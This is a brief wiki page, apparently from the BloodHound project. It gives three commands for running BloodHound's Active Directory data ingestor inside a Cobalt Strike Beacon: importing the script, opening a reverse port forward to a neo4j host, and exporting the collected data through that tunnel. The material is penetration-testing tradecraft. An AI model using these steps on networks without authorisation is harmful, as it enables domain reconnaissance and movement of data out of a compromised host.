Skip to content

Ingestion using Common C2 Frameworks

Rohan Vazarkar edited this page Aug 6, 2016 · 1 revision

Ingestion using Beacon Reverse Port Forwards

  1. Import BloodHound.ps1 using: powershell-import <path-to-BloodHound.ps1>
  2. Set up a reverse port forward in beacon: rportforward 7474 <neo4j host/ip> 7474
  3. Run the ingestor: powershell Get-BloodHoundData | Export-BloodHoundData -URI http://127.0.0.1:7474 -UserPass "user:pass"